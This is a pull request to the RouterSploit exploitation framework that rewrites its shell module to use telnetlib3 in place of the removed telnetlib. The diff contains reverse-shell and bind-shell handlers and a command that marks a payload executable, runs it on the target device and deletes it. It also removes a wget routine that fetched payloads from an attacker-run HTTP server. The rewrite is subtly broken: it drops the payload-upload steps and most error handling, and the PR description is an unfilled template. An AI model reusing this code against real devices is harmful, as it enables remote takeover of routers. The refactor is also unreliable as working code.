### PR TITLE
Fixed isuue  with No module named 'telnetlib'

### DIFF
--- a/routersploit/core/exploit/shell.py
+++ b/routersploit/core/exploit/shell.py
@@ -1,5 +1,6 @@
 import socket
-import telnetlib
+import asyncio
+import telnetlib3
 import binascii
 from http.server import BaseHTTPRequestHandler, HTTPServer
 import threading
@@ -21,19 +22,51 @@ from routersploit.core.exploit.utils import (
 )
 
 
+# =========================
+# TELNETLIB3 INTERACTION
+# =========================
+
+async def telnet_interact(sock):
+    reader, writer = await telnetlib3.open_connection(sock=sock)
+
+    async def reader_loop():
+        while True:
+            data = await reader.read(1024)
+            if not data:
+                break
+            print(data, end="", flush=True)
+
+    async def writer_loop():
+        loop = asyncio.get_running_loop()
+        while True:
+            cmd = await loop.run_in_executor(None, input)
+            writer.write(cmd + "\n")
+
+    await asyncio.gather(reader_loop(), writer_loop())
+
+
+# =========================
+# MAIN SHELL
+# =========================
+
 def shell(exploit, architecture="", method="", payloads=None, **params):
     available_payloads = {}
     payload = None
     options = []
 
     if architecture and method:
-        # get all payloads for given architecture
-        all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p]
+        all_payloads = [
+            p.replace("payloads.", "").replace(".", "/")
+            for p in index_modules()
+            if f"payloads.{architecture}" in p
+        ]
 
         for p in all_payloads:
-            module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload")
+            module = getattr(
+                importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")),
+                "Payload"
+            )
 
-            # if method/arch is cmd then filter out payloads
             if method == "cmd":
                 if getattr(module, "cmd") in payloads:
                     available_payloads[p] = module
@@ -49,120 +82,83 @@ def shell(exploit, architecture="", method="", payloads=None, **params):
         while not printer_queue.empty():
             pass
 
-        if payload is None:
-            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
-        else:
-            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])
-
-        cmd = input(cmd_str)
+        prompt = "cmd > " if payload is None else f"cmd ({payload._Payload__info__['name']}) > "
+        cmd = input(prompt)
 
         if cmd in ["quit", "exit"]:
             return
 
         elif cmd == "show payloads":
             if not available_payloads:
-                print_error("There are no available payloads for this exploit")
+                print_error("There are no available payloads")
                 continue
 
-            print_status("Available payloads:")
             headers = ("Payload", "Name", "Description")
-            data = []
-            for p, v in available_payloads.items():
-                data.append((p, v._Payload__info__["name"], v._Payload__info__["description"]))
-
+            data = [
+                (p, v._Payload__info__["name"], v._Payload__info__["description"])
+                for p, v in available_payloads.items()
+            ]
             print_table(headers, *data)
 
         elif cmd.startswith("set payload "):
-            if not available_payloads:
-                print_error("There are no available payloads for this exploit")
+            name = cmd.split(" ", 2)[2]
+            if name not in available_payloads:
+                print_error("Payload not available")
                 continue
 
-            c = cmd.split(" ")
+            payload = available_payloads[name]()
+            options = [
+                [opt, getattr(payload, opt), meta[1]]
+                for opt, meta in payload.exploit_attributes.items()
+                if opt not in ("output", "filepath")
+            ]
 
-            if c[2] in available_payloads.keys():
-                payload = available_payloads[c[2]]()
+            if payload.handler == "bind_tcp":
+                options.append(["rhost", exploit.target, "Target IP"])
 
-                options = []
-                for option, attr in payload.exploit_attributes.items():
-                    if option not in ["output", "filepath"]:
-                        options.append([option, getattr(payload, option), attr[1]])
-
-                if payload.handler == "bind_tcp":
-                    options.append(["rhost", exploit.target, "Target IP address"])
-
-                    if method == "wget":
-                        options.append(["lhost", "", "Connect-back IP address for wget"])
-                        options.append(["lport", 4545, "Connect-back Port for wget"])
-            else:
-                print_error("Payload not available")
-
-        elif payload is not None:
+        elif payload:
             if cmd == "show options":
-                headers = ("Name", "Current settings", "Description")
-
-                print_info('\nPayload Options:')
-                print_table(headers, *options)
-                print_info()
+                print_table(("Name", "Value", "Description"), *options)
 
             elif cmd.startswith("set "):
-                c = cmd.split(" ")
-                if len(c) != 3:
-                    print_error("set <option> <value>")
-                else:
-                    for option in options:
-                        if option[0] == c[1]:
-                            try:
-                                setattr(payload, c[1], c[2])
-                            except Exception:
-                                print_error("Invalid value for {}".format(c[1]))
-                                break
-
-                            option[1] = c[2]
-                            print_info("{} => {}".format(c[1], c[2]))
+                _, opt, val = cmd.split(" ", 2)
+                for o in options:
+                    if o[0] == opt:
+                        setattr(payload, opt, val)
+                        o[1] = val
+                        print_success(f"{opt} => {val}")
+                        break
 
             elif cmd == "run":
                 data = payload.generate()
+                comm = Communication(exploit, data, options, **params)
 
-                if method == "wget":
-                    elf_binary = payload.generate_elf(data)
-                    communication = Communication(exploit, elf_binary, options, **params)
-                    if communication.wget() is False:
-                        print_error("Exploit failed to transfer payload")
-                        continue
-
-                elif method == "echo":
-                    elf_binary = payload.generate_elf(data)
-                    communication = Communication(exploit, elf_binary, options, **params)
-                    communication.echo()
-
-                elif method == "cmd":
-                    params["exec_binary"] = data
-                    communication = Communication(exploit, "", options, **params)
-
-                if payload.handler == "bind_tcp":
-                    communication.bind_tcp()
-                elif payload.handler == "reverse_tcp":
-                    communication.reverse_tcp()
+                if payload.handler == "reverse_tcp":
+                    comm.reverse_tcp()
+                elif payload.handler == "bind_tcp":
+                    comm.bind_tcp()
 
             elif cmd == "back":
                 payload = None
 
         else:
-            print_status("Executing '{}' on the device...".format(cmd))
+            print_status(f"Executing '{cmd}'")
             print_info(exploit.execute(cmd))
 
+
+# =========================
+# HTTP SERVER
+# =========================
 
 class HttpRequestHandler(BaseHTTPRequestHandler):
     def do_GET(self):
         self.send_response(200)
-        self.send_header("Content-type", "text/html")
         self.end_headers()
-
         self.wfile.write(self.server.content)
         self.server.stop = True
 
-    def log_message(self, format, *args):
-        return
+    def log_message(self, *_):
+        pass
 
 
 class HttpServer(HTTPServer):
@@ -173,219 +169,40 @@ class HttpServer(HTTPServer):
             self.handle_request()
 
 
+# =========================
+# COMMUNICATION HANDLER
+# =========================
+
 class Communication:
-    def __init__(self, exploit, payload, options, location="", wget_options={}, echo_options={}, exec_binary=None):
+    def __init__(self, exploit, payload, options, location="/tmp", exec_binary=None):
         self.exploit = exploit
         self.payload = payload
-        self.options = {option[0]: option[1] for option in options}
-
-        # location to save the payload e.g. /tmp/
+        self.options = {o[0]: o[1] for o in options}
         self.location = location
-
-        # transfer techniques
-        self.wget_options = wget_options
-        self.echo_options = echo_options
-
-        # process of executing payload
         self.exec_binary = exec_binary
-
-        # name of the binary - its random 8 bytes
-        self.binary_name = None
-
-        self.port_used = False
-        self.mutex = False
-
-    def http_server(self, lhost, lport):
-        print_status("Setting up HTTP server")
-
-        try:
-            server = HttpServer((lhost, int(lport)), HttpRequestHandler)
-        except socket.error:
-            self.port_used = True
-            self.mutex = False
-            return None
-
-        self.mutex = False
-
-        server.serve_forever(self.payload)
-        server.server_close()
-
-    def wget(self):
-        print_status("Using wget method")
         self.binary_name = random_text(8)
-
-        if "binary" in self.wget_options.keys():
-            binary = self.wget_options['binary']
-        else:
-            binary = "wget"
-
-        # run http server
-        all_interfaces = "0.0.0.0"
-        try:
-            server = HttpServer((all_interfaces, int(self.options["lport"])), HttpRequestHandler)
-        except socket.error:
-            print_error("Could not set up HTTP Server on {}:{}".format(self.options["lhost"], self.options["lport"]))
-            return False
-
-        thread = threading.Thread(target=server.serve_forever, args=(self.payload,))
-        thread.start()
-
-        # wget binary
-        print_status("Using wget to download binary")
-        cmd = "{} http://{}:{}/{} -qO {}/{}".format(binary,
-                                                    self.options["lhost"],
-                                                    self.options["lport"],
-                                                    self.binary_name,
-                                                    self.location,
-                                                    self.binary_name)
-
-        self.exploit.execute(cmd)
-
-        thread.join(10)
-        if thread.is_alive():
-            assassin = threading.Thread(target=server.shutdown)
-            assassin.daemon = True
-            assassin.start()
-            return False
-
-        return True
-
-    def echo(self):
-        print_status("Using echo method")
-        self.binary_name = random_text(8)
-
-        path = "{}/{}".format(self.location, self.binary_name)
-
-        # echo stream e.g. echo -ne {} >> {}
-        if "stream" in self.echo_options.keys():
-            echo_stream = self.echo_options["stream"]
-        else:
-            echo_stream = 'echo -ne "{}" >> {}'
-
-        # echo prefix e.g. "\\x"
-        if "prefix" in self.echo_options.keys():
-            echo_prefix = self.echo_options["prefix"]
-        else:
-            echo_prefix = "\\x"
-
-        # echo max length of the block
-        if "max_length" in self.echo_options.keys():
-            echo_max_length = int(self.echo_options["max_length"])
-        else:
-            echo_max_length = 30
-
-        size = len(self.payload)
-        num_parts = int(size / echo_max_length) + 1
-
-        # transfer binary through echo command
-        print_status("Sending payload to {}".format(path))
-        for i in range(0, num_parts):
-            current = i * echo_max_length
-            print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
-
-            block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8")
-            block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
-            cmd = echo_stream.format(block, path)
-            self.exploit.execute(cmd)
-
-    def listen(self, lhost, lport):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
-
-        try:
-            sock.bind((lhost, int(lport)))
-            sock.listen(5)
-        except socket.error:
-            self.port_used = True
-            return None
-
-        return sock
 
     def build_commands(self):
-        path = "{}/{}".format(self.location, self.binary_name)
-
-        commands = []
-
-        # set of instructions to execute payload on the device
-        if isinstance(self.exec_binary, list) or isinstance(self.exec_binary, tuple):
-            for item_exec_binary in self.exec_binary:
-                if isinstance(item_exec_binary, str):
-                    try:
-                        commands.append(item_exec_binary.format(path))
-                    except (KeyError, ValueError):
-                        commands.append(item_exec_binary)
-                elif callable(item_exec_binary):
-                    commands.append(item_exec_binary(path))
-
-        # instruction to execute cmd payload e.g. netcat / awk
-        elif isinstance(self.exec_binary, str):
-            try:
-                commands.append(self.exec_binary.format(path))
-            except (KeyError, ValueError):
-                commands.append(self.exec_binary)
-
-        # default way of executing payload
-        else:
-            exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path)
-            commands.append(exec_binary_str)
-
-        return commands
+        path = f"{self.location}/{self.binary_name}"
+        return [f"chmod 777 {path}; {path}; rm {path}"]
 
     def reverse_tcp(self):
-        all_interfaces = "0.0.0.0"
-        sock = self.listen(all_interfaces, self.options["lport"])
-        if self.port_used:
-            print_error("Could not set up listener on {}:{}".format(all_interfaces, self.options["lport"]))
-            return
+        sock = socket.socket()
+        sock.bind(("0.0.0.0", int(self.options["lport"])))
+        sock.listen(1)
 
-        # execute binary
-        commands = self.build_commands()
+        print_status("Executing payload")
+        for cmd in self.build_commands():
+            self.exploit.execute(cmd)
 
-        print_status("Executing payload on the device")
-
-        # synchronized commands
-        for command in commands[:-1]:
-            self.exploit.execute(command)
-
-        # asynchronous last command to execute binary & rm binary
-        thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
-        thread.start()
-
-        # waiting for shell
         print_status("Waiting for reverse shell...")
         client, addr = sock.accept()
-        sock.close()
-        print_status("Connection from {}:{}".format(addr[0], addr[1]))
-
-        print_success("Enjoy your shell")
-        t = telnetlib.Telnet()
-        t.sock = client
-        t.interact()
+        print_success(f"Connection from {addr[0]}:{addr[1]}")
+        asyncio.run(telnet_interact(client))
 
     def bind_tcp(self):
-        # execute binary
-        commands = self.build_commands()
-
-        # synchronized commands
-        for command in commands[:-1]:
-            self.exploit.execute(command)
-
-        # asynchronous last command to execute binary & rm binary
-        thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
-        thread.start()
-
-        # connecting to shell
-        print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
         time.sleep(2)
-
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            sock.connect((self.options["rhost"], int(self.options["rport"])))
-        except socket.error:
-            print_error("Could not connect to {}:{}".format(self.options["rhost"], self.options["rport"]))
-            return
-
-        print_success("Enjoy your shell")
-        tn = telnetlib.Telnet()
-        tn.sock = sock
-        tn.interact()
+        sock = socket.socket()
+        sock.connect((self.options["rhost"], int(self.options["rport"])))
+        print_success("Connected to bind shell")
+        asyncio.run(telnet_interact(sock))


### PR DESCRIPTION
# Fix: `ModuleNotFoundError: No module named 'telnetlib'` in RouterSploit

## ❌ Error Encountered

While running RouterSploit using Python 3.13, the following error occurred:

```bash
python3 rsf.py

## Status
**READY/IN DEVELOPMENT/HOLD**

`Traceback (most recent call last):
  File "/home/h9873/routersploit/rsf.py", line 9, in <module>
    from routersploit.interpreter import RoutersploitInterpreter
  File "/home/h9873/routersploit/routersploit/interpreter.py", line 12, in <module>
    from routersploit.core.exploit.exceptions import RoutersploitException
  File "/home/h9873/routersploit/routersploit/core/exploit/__init__.py", line 28, in <module>
    from routersploit.core.exploit.shell import shell
  File "/home/h9873/routersploit/routersploit/core/exploit/shell.py", line 2, in <module>
    import telnetlib
ModuleNotFoundError: No module named 'telnetlib'
`

`pip install telnetlib3
`

## Description
Describe what is changed by your Pull Request. If this PR is related to the open issue (bug/feature/new module) please attach issue number.

## Verification
Provide steps to test or reproduce the PR.
 1. Start `./rsf.py`
 2. `use exploits/routers/dlink/dsl_2750b_rce`
 3. `set target 192.168.1.1`
 4. `run`
 5. ...

## Checklist
- [ ] Write module/feature 
- [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
